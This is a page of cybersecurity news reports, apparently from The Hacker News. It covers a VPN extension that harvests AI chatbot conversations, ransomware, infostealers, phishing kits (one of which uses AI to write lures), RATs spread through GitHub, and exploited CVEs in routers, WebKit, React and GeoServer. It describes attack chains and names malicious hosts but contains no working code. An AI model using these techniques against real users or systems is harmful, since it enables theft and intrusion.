Tag: Cyber Threats

A Google Chrome extension with a “Featured” badge and six million users has been observed silently gathering every prompt entered by users into artificial intelligence (AI)-powered chatbots like OpenAI ChatGPT, Anthropic Claude, Microsoft Copilot, DeepSeek, Google Gemini, xAI Grok, Meta AI, and Perplexity.

The extension in question is Urban VPN Proxy, which has a 4.7 rating on the Google Chrome Web Store. It’s advertised as the “best secured Free VPN access to any website, and unblock content.” Its developer is a Delaware-based company named Urban Cyber Security Inc. On the Microsoft Edge Add-ons marketplace, it has 1.3 million installations.

Despite claiming that it allows users to “protect your online identity, stay protected, and hide your IP,” the extension was updated on July 9, 2025, when version 5.5.0 was released with the AI data harvesting enabled by default using hard-coded settings.

Specifically, this is achieved by means of a tailored executor JavaScript that’s triggered for each of the AI chatbots (i.e., chatgpt.js, claude.js, gemini.js) to intercept and gather the conversations every time a user who has installed the extension visits any of the targeted platforms.

Once the script is injected, it overrides the browser APIs used to handle network requests – fetch() and XMLHttpRequest() – to make sure that every request is first routed through the extension’s code so as to capture the conversation data, including users’ prompts and the chatbot’s responses, and exfiltrate them to two remote servers (“analytics.urban-vpn[.]com” and “stats.urban-vpn[.]com”).

The exact list of data captured by the extension is as follows –

• Prompts entered by the user
• Chatbot responses
• Conversation identifiers and timestamps
• Session metadata
• AI platform and model used

“Chrome and Edge extensions auto-update by default,” Koi Security’s Idan Dardikman said in a report published today. “Users who installed Urban VPN for its stated purpose – VPN functionality – woke up one day with new code silently harvesting their AI conversations.”

It’s worth mentioning that Urban VPN’s updated privacy policy, as of June 25, 2025, mentions that it collects this data to enhance Safe Browsing and for marketing analytics purposes, and that any other secondary use of the gathered AI prompts will be carried out on de-identified and anonymized data –

One of the third-parties it shares “Web Browsing Data” with is an affiliated ad intelligence and brand monitoring firm named BIScience. The company uses the raw (not anonymized) data to create insights that are “commercially used and shared with Business Partners,” the VPN software maker notes.

It’s worth noting BiScience, which also happens to own Urban Cyber Security Inc., was called out by an anonymous researcher earlier this January for collecting users’ browsing history, or clickstream data, as it’s called, under misleading privacy policy disclosures.

The company is alleged to provide a software development kit (SDK) to partner third-party extension developers to collect clickstream data from users, which is transmitted to the sclpfybn[.]com and other endpoints under its control.

“BIScience and partners take advantage of loopholes in the Chrome Web Store policies, mainly exceptions listed in the Limited Use policy, which are the ‘approved use cases,’” the researcher noted, adding they “develop user-facing features that allegedly require access to browsing history, to claim the ‘necessary to providing or improving your single purpose’ exception.”

On the extension listing page, Urban VPN also highlights an “AI protection” feature, which it says checks prompts for personal data, chatbot responses for suspicious or unsafe links, and displays a warning before users submit their prompts or click on them.

While this monitoring is framed as preventing users from accidentally sharing any personal information, what the developers fail to mention is that the data collection happens regardless of whether the feature is enabled.

“The protection feature shows occasional warnings about sharing sensitive data with AI companies,” Dardikman said. “The harvesting feature sends that exact sensitive data – and everything else – to Urban VPN’s own servers, where it’s sold to advertisers. The extension warns you about sharing your email with ChatGPT while simultaneously exfiltrating your entire conversation to a data broker.”

Koi Security said it observed identical AI harvesting functionality in three other unique extensions from the same publisher across Chrome and Microsoft Edge, taking its total install base to over eight million –

• 1ClickVPN Proxy
• Urban Browser Guard
• Urban Ad Blocker

All these extensions, with the exception of Urban Ad Blocker for Edge, carry the “Featured” badge, giving users an impression that they follow the platform’s “best practices and meet a high standard of user experience and design.”

“These badges signal to users that the extensions have been reviewed and meet platform quality standards,” Dardikman pointed out. “For many users, a Featured badge is the difference between installing an extension and passing it by – it’s an implicit endorsement from Google and Microsoft.”

The findings once again demonstrate how trust associated with extension marketplaces can be abused to amass sensitive data at scale, especially at a time when users are increasingly sharing deeply personal information, getting advice, and discussing emotions with AI chatbots.

The Hacker News has reached out to both Google and Microsoft for comment, and we will update the story if we hear back.

Dec 15, 2025Ravie LakshmananRansomware / Cybercrime

The pro-Russian hacktivist group known as CyberVolk (aka GLORIAMIST) has resurfaced with a new ransomware-as-a-service (RaaS) offering called VolkLocker that suffers from implementation lapses in test artifacts, allowing users to decrypt files without paying an extortion fee.

According to SentinelOne, VolkLocker (aka CyberVolk 2.x) emerged in August 2025 and is capable of targeting both Windows and Linux systems. It’s written in Golang.

“Operators building new VolkLocker payloads must provide a bitcoin address, Telegram bot token ID, Telegram chat ID, encryption deadline, desired file extension, and self-destruct options,” security researcher Jim Walter said in a report published last week.

Once launched, the ransomware attempts to escalate privileges, performs reconnaissance and system enumeration, including checking local MAC address prefixes against known virtualization vendors like Oracle and VMware. In the next stage, it lists all available drives and determines the files to be encrypted based on the embedded configuration.

VolkLocker uses AES-256 in Galois/Counter Mode (GCM) for encryption through Golang’s “crypto/rand” package. Every encrypted file is assigned a custom extension such as .locked or .cvolk.

However, an analysis of the test samples has uncovered a fatal flaw where the locker’s master keys are not only hard-coded in the binaries, but are also used to encrypt all files on a victim system. More importantly, the master key is also written to a plaintext file in the %TEMP% folder (“C:UsersAppDataLocalTempsystem_backup.key”).

Since this backup key file is never deleted, the design blunder enables self-recovery. That said, VolkLocker has all the hallmarks typically associated with a ransomware strain. It makes Windows Registry modifications to thwart recovery and analysis, deletes volume shadow copies, and terminates processes associated with Microsoft Defender Antivirus and other common analysis tools.

However, where it stands out is in the use of an enforcement timer, which wipes the content of user folders, viz. Documents, Desktop, Downloads, and Pictures, if victims fail to pay within 48 hours or enter the wrong decryption key three times.

CyberVolk’s RaaS operations are managed through Telegram, costing prospective customers between $800 and $1,100 for either a Windows or Linux version, or between $1,600 and $2,200 for both operating systems. VolkLocker payloads come with built-in Telegram automation for command-and-control, allowing users to message victims, initiate file decryption, list active victims, and get system information.

As of November 2025, the threat actors have advertised a remote access trojan and keylogger, both priced at $500 each, indicating a broadening of their monetization strategy.

CyberVolk launched its own RaaS in June 2024. Known for conducting distributed denial-of-service (DDoS) and ransomware attacks on public and government entities to support Russian government interests, it’s believed to be of Indian origin.

“Despite repeated Telegram account bans and channel removals throughout 2025, CyberVolk has reestablished its operations and expanded its service offerings,” Walter said. “Defenders should see CyberVolk’s adoption of Telegram-based automation as a reflection of broader trends among politically-motivated threat actors. These groups continue to lower barriers for ransomware deployment while operating on platforms that provide convenient infrastructure for criminal services.”

Dec 15, 2025Ravie LakshmananMalware / Cybercrime

Cybersecurity researchers have disclosed details of an active phishing campaign that’s targeting a wide range of sectors in Russia with phishing emails that deliver Phantom Stealer via malicious ISO optical disc images.

The activity, codenamed Operation MoneyMount-ISO by Seqrite Labs, has primarily singled out finance and accounting entities, with those in the procurement, legal, payroll verticals emerging as secondary targets.

“This campaign employs a fake payment confirmation lure to deliver the Phantom information-stealing malware through a multi-stage attachment chain,” the cybersecurity company said.

The infection chain begins with a phishing email that masquerades as legitimate financial communications, urging recipients to confirm a recent bank transfer. Attached to the email is a ZIP archive that claims to contain additional details, but, instead, contains an ISO file that, when launched, mounts on the system as a virtual CD drive.

The ISO image (“Подтверждение банковского перевода.iso” or “Bank transfer confirmation.iso”) serves as an executable that’s designed to launch Phantom Stealer by means of an embedded DLL (“CreativeAI.dll”).

Phantom Stealer is capable of extracting data from cryptocurrency wallet browser extensions installed in Chromium-based browsers and desktop wallet apps, as well as grab files, Discord authentication tokens, and browser-related passwords, cookies, and credit card details.

It also monitors clipboard content, logs keystrokes, and runs a series of checks to detect virtualized, sandboxed, or analysis environments, and if so, aborts its execution. Data exfiltration is achieved via a Telegram bot or to an attacker-controlled Discord webhook. On top of that, the stealer enables file transfer to an FTP server.

In recent months, Russian organizations, mainly human resources and payroll departments, have also been targeted by phishing emails that employ lures related to bonuses or internal financial policies to deploy a previously undocumented implant named DUPERUNNER that loads AdaptixC2, an open-source command-and-control (C2) framework.

Dubbed DupeHike, the campaign has been attributed to a threat cluster named UNG0902.

“The ZIP has been used as a preliminary source of spear-phishing-based infection containing decoys with PDF and LNK extension, which downloads the implant DUPERUNNER, which finally executes the Adaptix C2 Beacon,” Seqrite said.

The LNK file (“Документ_1_О_размере_годовой_премии.pdf.lnk” or “Document_1_On_the_amount_of_the_annual_bonus.pdf.lnk”), in turn, proceeds to download DUPERUNNER from an external server using “powershell.exe.” The primary responsibility of the implant is to retrieve and display a decoy PDF and launch AdaptixC2 by injecting it into a legitimate Windows process like “explorer.exe,” “notepad.exe,” and “msedge.exe.”

Other phishing campaigns have taken aim at finance, legal, and aerospace sectors in Russia to distribute Cobalt Strike and malicious tools like Formbook, DarkWatchman, and PhantomRemote that are capable of data theft and hands-on keyboard control. The email servers of compromised Russian companies are used to send the spear-phishing messages.

French cybersecurity company Intrinsec has attributed the intrusion set targeting the Russian aerospace industry to hacktivists aligned with Ukrainian interests. The activity, detected between June and September 2025, shares overlaps with Hive0117, Operation CargoTalon, and Rainbow Hyena (aka Fairy Trickster, Head Mare, and PhantomCore).

Some of these efforts have also been found to redirect users to phishing login pages hosted on the InterPlanetary File System (IPFS) and Vercel, designed to steal credentials associated with Microsoft Outlook and Bureau 1440, a Russian aerospace company.

“The campaigns observed between June and September 2025 […] aimed at compromising entities actively cooperating with Russia’s army amidst the current conflict with Ukraine, largely assessed by the Western sanctions imposed on them,” Intrinsec said.

Dec 13, 2025Ravie LakshmananNetwork Security / Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a high-severity flaw impacting Sierra Wireless AirLink ALEOS routers to its Known Exploited Vulnerabilities (KEV) catalog, following reports of active exploitation in the wild.

CVE-2018-4063 (CVSS score: 8.8/9.9) refers to an unrestricted file upload vulnerability that could be exploited to achieve remote code execution by means of a malicious HTTP request.

“A specially crafted HTTP request can upload a file, resulting in executable code being uploaded, and routable, to the webserver,” the agency said. “An attacker can make an authenticated HTTP request to trigger this vulnerability.”

Details of the six-year-old flaw were publicly shared by Cisco Talos in April 2019, describing it as an exploitable remote code execution vulnerability in the ACEManager “upload.cgi” function of Sierra Wireless AirLink ES450 firmware version 4.9.3. Talos reported the flaw to the Canadian company in December 2018.

“This vulnerability exists in the file upload capability of templates within the AirLink 450,” the company said. “When uploading template files, you can specify the name of the file that you are uploading.”

“There are no restrictions in place that protect the files that are currently on the device, used for normal operation. If a file is uploaded with the same name of the file that already exists in the directory, then we inherit the permissions of that file.”

Talos noted that some of the files that exist in the directory (e.g., “fw_upload_init.cgi” or “fw_status.cgi”) have executable permissions on the device, meaning an attacker can send HTTP requests to the “/cgi-bin/upload.cgi” endpoint to upload a file with the same name to achieve code execution.

This is compounded by the fact that ACEManager runs as root, thereby causing any shell script or executable uploaded to the device to also run with elevated privileges.

The addition of CVE-2018-4063 to the KEV catalog comes a day after a honeypot analysis conducted by Forescout over a 90-day period revealed that industrial routers are the most attacked devices in operational technology (OT) environments, with threat actors attempting to deliver botnet and cryptocurrency miner malware families like RondoDox, Redtail, and ShadowV2 by exploiting the following flaws –

Attacks have also been recorded from a previously undocumented threat cluster named Chaya_005 that weaponized CVE-2018-4063 in early January 2024 to upload an unspecified malicious payload with the name “fw_upload_init.cgi.” No further successful exploitation efforts have been detected since then.

“Chaya_005 appears to be a broader reconnaissance campaign testing multiple vendor vulnerabilities rather than focusing on a single one,” Forescout Research – Vedere Labs said, adding it’s likely the cluster is no longer a “significant threat.”

In light of active exploitation of CVE-2018-4063, Federal Civilian Executive Branch (FCEB) agencies are advised to update their devices to a supported version or discontinue the use of the product by January 2, 2026, since it has reached end-of-support status.

Dec 13, 2025Ravie LakshmananZero-Day / Vulnerability

Apple on Friday released security updates for iOS, iPadOS, macOS, tvOS, watchOS, visionOS, and its Safari web browser to address two security flaws that it said have been exploited in the wild, one of which is the same flaw that was patched by Google in Chrome earlier this week.

The vulnerabilities are listed below –

• CVE-2025-43529 (CVSS score: N/A) – A use-after-free vulnerability in WebKit that may lead to arbitrary code execution when processing maliciously crafted web content
• CVE-2025-14174 (CVSS score: 8.8) – A memory corruption issue in WebKit that may lead to memory corruption when processing maliciously crafted web content

Apple said it’s aware that the shortcomings “may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26.”

It’s worth noting that CVE-2025-14174 is the same vulnerability that Google issued patches for in its Chrome browser on December 10, 2025. It’s been described by the tech giant as an out-of-bounds memory access in the company’s open-source Almost Native Graphics Layer Engine (ANGLE) library, specifically in its Metal renderer.

Apple Security Engineering and Architecture (SEAR) and Google Threat Analysis Group (TAG) have been credited with discovering and reporting the flaw, while Apple credited TAG with finding CVE-2025-43529.

This indicates that the vulnerabilities were likely weaponized in highly-targeted mercenary spyware attacks, given that they both affect WebKit, the rendering engine that’s also used in all third-party web browsers on iOS and iPadOS, including Chrome, Microsoft Edge, Mozilla Firefox, and others.

The flaws have been addressed in the following versions and devices –

• iOS 26.2 and iPadOS 26.2 – iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later
• iOS 18.7.3 and iPadOS 18.7.3 – iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later
• macOS Tahoe 26.2 – Macs running macOS Tahoe
• tvOS 26.2 – Apple TV HD and Apple TV 4K (all models)
• watchOS 26.2 – Apple Watch Series 6 and later
• visionOS 26.2 – Apple Vision Pro (all models)
• Safari 26.2 – Macs running macOS Sonoma and macOS Sequoia

With these updates, Apple has now patched nine zero-day vulnerabilities that were exploited in the wild in 2025, including CVE-2025-24085, CVE-2025-24200, CVE-2025-24201, CVE-2025-31200, CVE-2025-31201, CVE-2025-43200, and CVE-2025-43300.

Cybersecurity researchers have documented four new phishing kits named BlackForce, GhostFrame, InboxPrime AI, and Spiderman that are capable of facilitating credential theft at scale.

BlackForce, first detected in August 2025, is designed to steal credentials and perform Man-in-the-Browser (MitB) attacks to capture one-time passwords (OTPs) and bypass multi-factor authentication (MFA). The kit is sold on Telegram forums for anywhere between €200 ($234) and €300 ($351).

The kit, according to Zscaler ThreatLabz researchers Gladis Brinda R and Ashwathi Sasi, has been used to impersonate over 11 brands, including Disney, Netflix, DHL, and UPS. It’s said to be in active development.

“BlackForce features several evasion techniques with a blocklist that filters out security vendors, web crawlers, and scanners,” the company said. “BlackForce remains under active development. Version 3 was widely used until early August, with versions 4 and 5 being released in subsequent months.”

Phishing pages connected to the kit have been found to use JavaScript files with what has been described as “cache busting” hashes in their names (e.g., “index-[hash].js”), thereby forcing the victim’s web browser to download the latest version of the malicious script instead of using a cached version.

In a typical attack using the kit, victims who click on a link are redirected to a malicious phishing page, after which a server-side check filters out crawlers and bots, before serving them a page that’s designed to mimic a legitimate website. Once the credentials are entered on the page, the details are captured and sent to a Telegram bot and a command-and-control (C2) panel in real-time using an HTTP client called Axios.

When the attacker attempts to log in with the stolen credentials on the legitimate website, an MFA prompt is triggered. At this stage, the MitB techniques are used to display a fake MFA authentication page to the victim’s browser through the C2 panel. Should the victim enter the MFA code on the bogus page, it’s collected and used by the threat actor to gain unauthorized access to their account.

“Once the attack is complete, the victim is redirected to the homepage of the legitimate website, hiding evidence of the compromise and ensuring the victim remains unaware of the attack,” Zscaler said.

GhostFrame Fuels 1M+ Stealth Phishing Attacks

Another nascent phishing kit that has gained traction since its discovery in September 2025 is GhostFrame. At the heart of the kit’s architecture is a simple HTML file that appears harmless while hiding its malicious behavior within an embedded iframe, which leads victims to a phishing login page to steal Microsoft 365 or Google account credentials.

“The iframe design also allows attackers to easily switch out the phishing content, try new tricks or target specific regions, all without changing the main web page that distributes the kit,” Barracuda security researcher Sreyas Shetty said. “Further, by simply updating where the iframe points, the kit can avoid being detected by security tools that only check the outer page.”

Attacks using the GhostFrame kit commence with typical phishing emails that claim to be about business contracts, invoices, and password reset requests, but are designed to take recipients to the fake page. The kit uses anti-analysis and anti-debugging to prevent attempts to inspect it using browser developer tools, and generates a random subdomain each time someone visits the site.

The visible outer pages come with a loader script that’s responsible for setting up the iframe and responding to any messages from the HTML element. This can include changing the parent page’s title to impersonate trusted services, modifying the site favicon, or redirecting the top-level browser window to another domain.

In the final stage, the victim is sent to a secondary page containing the actual phishing components through the iframe delivered via the constantly changing subdomain, thereby making it harder to block the threat. The kit also incorporates a fallback mechanism in the form of a backup iframe appended at the bottom of the page in the event the loader JavaScript fails or is blocked.

InboxPrime AI Phishing Kit Automates Email Attacks

If BlackForce follows the same playbook as other traditional phishing kits, InboxPrime AI goes a step further by leveraging artificial intelligence (AI) to automate mass mailing campaigns. It’s advertised on a 1,300-member-strong Telegram channel under a malware-as-a-service (MaaS) subscription model for $1,000, granting purchasers a perpetual license and full access to the source code.

“It is designed to mimic real human emailing behavior and even leverages Gmail’s web interface to evade traditional filtering mechanisms,” Abnormal researchers Callie Baron and Piotr Wojtyla said.

“InboxPrime AI blends artificial intelligence with operational evasion techniques and promises cybercriminals near-perfect deliverability, automated campaign generation, and a polished, professional interface that mirrors legitimate email marketing software.”

The platform employs a user-friendly interface that allows customers to manage accounts, proxies, templates, and campaigns, mirroring commercial email automation tools. One of its core features is a built-in AI-powered email generator, which can produce entire phishing emails, including the subject lines, in a manner that mimics legitimate business communication.

In doing so, these services further lower the barrier to entry for cybercrime, effectively eliminating the manual work that goes into drafting such emails. In its place, attackers can configure parameters, such as language, topic, or industry, email length, and desired tone, which the toolkit uses as inputs to generate convincing lures that match the chosen theme.

What’s more, the dashboard enables users to save the produced email as a reusable template, complete with support for spintax to create variations of the email messages by substituting certain template variables. This ensures that no two phishing emails look identical and helps them bypass signature-based filters that look for similar content patterns.

Some of the other supported features in InboxPrime AI are listed below –

• A real-time spam diagnostic module that can analyze a generated email for common spam-filter triggers and suggest precise corrections
• Sender identity randomization and spoofing, enabling attackers to customize display names for each Gmail session

“This industrialization of phishing has direct implications for defenders: more attackers can now launch more campaigns with more volume, without any corresponding increase in defender bandwidth or resources,” Abnormal said. “This not only accelerates campaign launch time but also ensures consistent message quality, enables scalable, thematic targeting across industries, and empowers attackers to run professional-looking phishing operations without copywriting expertise.”

Spiderman Creates Pixel-Perfect Replicas of European Banks

The third phishing kit that has come under the cybersecurity radar is Spiderman, which permits attackers to target customers of dozens of European banks and online financial services providers, such as Blau, CaixaBank, Comdirect, Commerzbank, Deutsche Bank, ING, O2, Volksbank, Klarna, and PayPal.

“Spiderman is a full-stack phishing framework that replicates dozens of European banking login pages, and even some government portals,” Varonis researcher Daniel Kelley said. “Its organized interface provides cybercriminals with an all-in-one platform to launch phishing campaigns, capture credentials, and manage stolen session data in real-time.”

What’s notable about the modular kit is that its seller is marketing the solution in a Signal messenger group that has about 750 members, marking a departure from Telegram. Germany, Austria, Switzerland, and Belgium are the primary targets of the phishing service.

Like in the case of BlackForce, Spiderman utilizes various techniques like ISP allowlisting, geofencing, and device filtering to ascertain that only the intended targets can access the phishing pages. The toolkit is also equipped to capture cryptocurrency wallet seed phrases, intercept OTP and PhotoTAN codes, and trigger prompts to gather credit card data.

“This flexible, multi-step approach is particularly effective in European banking fraud, where login credentials alone often aren’t enough to authorize transactions,” Kelley explained. “After capturing credentials, Spiderman logs each session with a unique identifier so the attacker can maintain continuity through the entire phishing workflow.”

Hybrid Salty-Tycoon 2FA Attacks Spotted

BlackForce, GhostFrame, InboxPrime AI, and Spiderman are the latest additions to a long list of phishing kits like Tycoon 2FA, Salty 2FA, Sneaky 2FA, Whisper 2FA, Cephas, and Astaroth (not to be confused with a Windows banking trojan of the same name) that have emerged over the past year.

In a report published earlier this month, ANY.RUN said it observed a new Salty-Tycoon hybrid that’s already bypassing detection rules tuned to either of them. The new attack wave coincides with a sharp drop in Salty 2FA activity in late October 2025, with early stages matching Salty2FA, while later stages load code that reproduces Tycoon 2FA’s execution chain.

“This overlap marks a meaningful shift; one that weakens kit-specific rules, complicates attribution, and gives threat actors more room to slip past early detection,” the company said.

“Taken together, this provides clear evidence that a single phishing campaign, and, more interestingly, a single sample, contains traces of both Salty 2FA and Tycoon, with Tycoon serving as a fallback payload once the Salty infrastructure stopped working for reasons that are still unclear.”

Cybersecurity researchers are calling attention to a new campaign that’s leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT.

“These repositories, often themed as development utilities or OSINT tools, contain only a few lines of code responsible for silently downloading a remote HTA file and executing it via ‘mshta.exe,’” Morphisec researcher Yonatan Edri said in a report shared with The Hacker News.

PyStoreRAT has been described as a “modular, multi-stage” implant that can execute EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules. The malware also deploys an information stealer known as Rhadamanthys as a follow-on payload.

Attack chains involve distributing the malware through Python or JavaScript loader stubs embedded in GitHub repositories masquerading as OSINT tools, DeFi bots, GPT wrappers, and security-themed utilities that are designed to appeal to analysts and developers.

The earliest signs of the campaign go back to mid-June 2025, with a steady stream of “repositories” published since then. The tools are promoted via social media platforms like YouTube and X, as well as artificially inflate the repositories’ star and fork metrics – a technique reminiscent of the Stargazers Ghost Network.

The threat actors behind the campaign leverage either newly created GitHub accounts or those that lay dormant for months to publish the repositories, stealthily slipping the malicious payload in the form of “maintenance” commits in October and November after the tools began to gain popularity and landed on GitHub’s top trending lists.

In fact, many of the tools did not function as they were advertised, only displaying static menus or non-interactive interfaces in some cases, while others performed minimal placeholder operations. The intention behind the operation was to lend them a veneer of legitimacy by abusing GitHub’s inherent trust and deceiving users into executing the loader stub that’s responsible for initiating the infection chain.

Persistence is achieved by setting up a scheduled task that’s disguised as an NVIDIA app self-update. In the final stage, the malware contacts an external server to fetch commands to be executed on the host. Some of the supported commands are listed below –

• Download and execute EXE payloads, including Rhadamanthys
• Download and extract ZIP archives
• Downloads a malicious DLL and executes it using “rundll32.exe”
• Fetch raw JavaScript code and execute it dynamically in memory using eval()
• Download and install MSI packages
• Spawn a secondary “mshta.exe” process to load additional remote HTA payloads
• Execute PowerShell commands directly in memory
• Spread via removable drives by replacing legitimate documents with malicious Windows Shortcut (LNK) files
• Delete the scheduled task to remove the forensic trail

It’s currently not known who is behind the operation, but the presence of Russian-language artifacts and coding patterns alludes to a threat actor of likely Eastern European origin, Morphisec said.

“PyStoreRAT represents a shift toward modular, script-based implants that can adapt to security controls and deliver multiple payload formats,” Edri concluded. “Its use of HTA/JS for execution, Python loaders for delivery, and Falcon-aware evasion logic creates a stealthy first-stage foothold that traditional EDR solutions detect only late in the infection chain.”

The disclosure comes as Chinese security vendor QiAnXin detailed another new remote access trojan (RAT) codenamed SetcodeRat that’s likely being propagated across the country since October 2025 via malvertising lures. Hundreds of computers, including those belonging to governments and enterprises, are said to have been infected in a span of one month.

“The malicious installation package will first verify the region of the victim,” the QiAnXin Threat Intelligence Center said. “If it is not in the Chinese-speaking area, it will automatically exit.”

The malware is disguised as legitimate installers for popular programs like Google Chrome and proceeds to the next stage only if the system language corresponds to Mainland China (Zh-CN), Hong Kong (Zh-HK), Macao (Zh-MO), and Taiwan (Zh-TW). It also terminates the execution if a connection to a Bilibili URL (“api.bilibili[.]com/x/report/click/now”) is unsuccessful.

In the next stage, an executable named “pnm2png.exe” is launched to sideload “zlib1.dll,” which then decrypts the contents of a file called “qt.conf” and runs it. The decrypted payload is a DLL that embeds the RAT payload. SetcodeRat can either connect to Telegram or a conventional command-and-control (C2) server to retrieve instructions and carry out data theft.

It enables the malware to take screenshots, log keystrokes, read folders, set folders, start processes, run “cmd.exe,” set socket connections, collect system and network connection information, update itself to a new version.

Dec 12, 2025Ravie LakshmananVulnerability / Threat Intelligence

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has urged federal agencies to patch the recent React2Shell vulnerability by December 12, 2025, amid reports of widespread exploitation.

The critical vulnerability, tracked as CVE-2025-55182 (CVSS score: 10.0), affects the React Server Components (RSC) Flight protocol. The underlying cause of the issue is an unsafe deserialization that allows an attacker to inject malicious logic that the server executes in a privileged context. It also affects other frameworks, including Next.js, Waku, Vite, React Router, and RedwoodSDK.

“A single, specially crafted HTTP request is sufficient; there is no authentication requirement, user interaction, or elevated permissions involved,” Cloudforce One, Cloudflare’s threat intelligence team, said. “Once successful, the attacker can execute arbitrary, privileged JavaScript on the affected server.”

Since its public disclosure on December 3, 2025, the shortcoming has been exploited by multiple threat actors in various campaigns to engage in reconnaissance efforts and deliver a wide range of malware families.

The development prompted CISA to add it to its Known Exploited Vulnerabilities catalog last Friday, giving federal agencies until December 26 to apply the fixes. The deadline has since been revised to December 12, 2025, an indication of the severity of the incident.

Cloud security company Wiz said it has observed a “rapid wave of opportunistic exploitation” of the flaw, with a vast majority of the attacks targeting internet-facing Next.js applications and other containerized workloads running in Kubernetes and managed cloud services.

Image Source: Cloudflare

Cloudflare, which is also tracking ongoing exploitation activity, said threat actors have conducted searches using internet-wide scanning and asset discovery platforms to find exposed systems running React and Next.js applications. Notably, some of the reconnaissance efforts have excluded Chinese IP address spaces from their searches.

“Their highest-density probing occurred against networks in Taiwan, Xinjiang Uyghur, Vietnam, Japan, and New Zealand – regions frequently associated with geopolitical intelligence collection priorities,” the web infrastructure company said.

The observed activity is also said to have targeted, albeit more selectively, government (.gov) websites, academic research institutions, and critical‑infrastructure operators. This included a national authority responsible for the import and export of uranium, rare metals, and nuclear fuel.

Some of the other notable findings are listed below –

• Prioritizing high‑sensitivity technology targets such as enterprise password managers and secure‑vault services, likely with the goal of perpetrating supply chain attacks
• Targeting edge‑facing SSL VPN appliances whose administrative interfaces may incorporate React-based components
• Early scanning and exploitation attempts originated from IP addresses previously associated with Asia-affiliated threat clusters

In its own analysis of honeypot data, Kaspersky said it recorded over 35,000 exploitation attempts on a single day on December 10, 2025, with the attackers first probing the system by running commands like whoami, before dropping cryptocurrency miners or botnet malware families like Mirai/Gafgyt variants and RondoDox.

Security researcher Rakesh Krishnan has also discovered an open directory hosted on “154.61.77[.]105:8082” that includes a proof-of-concept (PoC) exploit script for CVE-2025–55182 along with two other files –

• “domains.txt,” which contains a list of 35,423 domains
• “next_target.txt,” which contains a list of 596 URLs, including companies like Dia Browser, Starbucks, Porsche, and Lululemon

It has been assessed that the unidentified threat actor is actively scanning the internet based on targets added to the second file, infecting hundreds of pages in the process.

According to the latest data from The Shadowserver Foundation, there are more than 137,200 internet-exposed IP addresses running vulnerable code as of December 11, 2025. Of these, over 88,900 instances are located in the U.S., followed by Germany (10,900), France (5,500), and India (3,600).

Dec 12, 2025Ravie LakshmananVulnerability / Server Security

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a high-severity security flaw impacting OSGeo GeoServer to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation in the wild.

The vulnerability in question is CVE-2025-58360 (CVSS score: 8.2), an unauthenticated XML External Entity (XXE) flaw that affects all versions prior to and including 2.25.5, and from versions 2.26.0 through 2.26.1. It has been patched in versions 2.25.6, 2.26.2, 2.27.0, 2.28.0, and 2.28.1. Artificial intelligence (AI)-powered vulnerability discovery platform XBOW has been acknowledged for reporting the issue.

“OSGeo GeoServer contains an improper restriction of XML external entity reference vulnerability that occurs when the application accepts XML input through a specific endpoint /geoserver/wms operation GetMap and could allow an attacker to define external entities within the XML request,” CISA said.

The following packages are affected by the flaw –

• docker.osgeo.org/geoserver
• org.geoserver.web:gs-web-app (Maven)
• org.geoserver:gs-wms (Maven)

Successful exploitation of the vulnerability could allow an attacker to access arbitrary files from the server’s file system, conduct Server-Side Request Forgery (SSRF) to interact with internal systems, or launch a denial-of-service (DoS) attack by exhausting resources, the maintainers of the open-source software said in an alert published late last month.

There are currently no details available on how the security defect is being abused in real-world attacks. However, a bulletin from the Canadian Centre for Cyber Security on November 28, 2025, said “an exploit for CVE-2025-58360 exists in the wild.”

It’s worth noting that another critical flaw in the same software (CVE-2024-36401, CVSS score: 9.8) has been exploited by multiple threat actors over the past year. Federal Civilian Executive Branch (FCEB) agencies are advised to apply the required fixes by January 1, 2026, to secure their networks.

The browser has become the main interface to GenAI for most enterprises: from web-based LLMs and copilots, to GenAI‑powered extensions and agentic browsers like ChatGPT Atlas. Employees are leveraging the power of GenAI to draft emails, summarize documents, work on code, and analyze data, often by copying/pasting sensitive information directly into prompts or uploading files.

Traditional security controls were not designed to understand this new prompt‑driven interaction pattern, leaving a critical blind spot where risk is highest. Security teams are simultaneously under pressure to enable more GenAI platforms because they clearly boost productivity.

Simply blocking AI is unrealistic. The more sustainable approach is to secure GenAI platforms where they are accessed by users: inside the browser session.

The GenAI browser threat model

The GenAI‑in‑the‑browser threat model must be approached differently from traditional web browsing due to several key factors.

1. Users routinely paste entire documents, code, customer records, or sensitive financial information into prompt windows. This can lead to data exposure or long‑term retention in the LLM system.
2. File uploads create similar risks when documents are processed outside of approved data‑handling pipelines or regional boundaries, putting organizations in jeopardy of violating regulations.
3. GenAI browser extensions and assistants often require broad permissions to read and modify page content. This includes data from internal web apps that users never intended to share with external services.
4. Mixed use of personal and corporate accounts in the same browser profile complicates attribution and governance.

All of these behaviors put together create a risk surface that is invisible to many legacy controls.

Policy: defining safe use in the browser

A workable GenAI security strategy in the browser is a clear, enforceable policy that defines what “safe use” means.

CISOs should categorize GenAI tools into sanctioned services and allow/disallow public tools and applications with different risk treatments and monitoring levels. After setting clear boundaries, enterprises can then align browser‑level enforcement so that the user experience matches the policy intent.

A strong policy consists of specifications around which data types are never allowed in GenAI prompts or uploads. Common restricted categories can include regulated personal data, financial details, legal information, trade secrets, and source code. The policy language should also be concrete and consistently enforced by technical controls rather than relying on user judgment.

Identity and session handling are central to GenAI browser security because they determine which data belongs to which account. Enforcing SSO for sanctioned GenAI platforms and tying usage back to enterprise identities will simplify logging and incident response. Browser‑level controls can help prevent cross‑access between work and personal contexts. For example, organizations can block copying content from corporate apps into GenAI applications when the user has not been authenticated into a corporate account.

Visibility, telemetry, and analytics

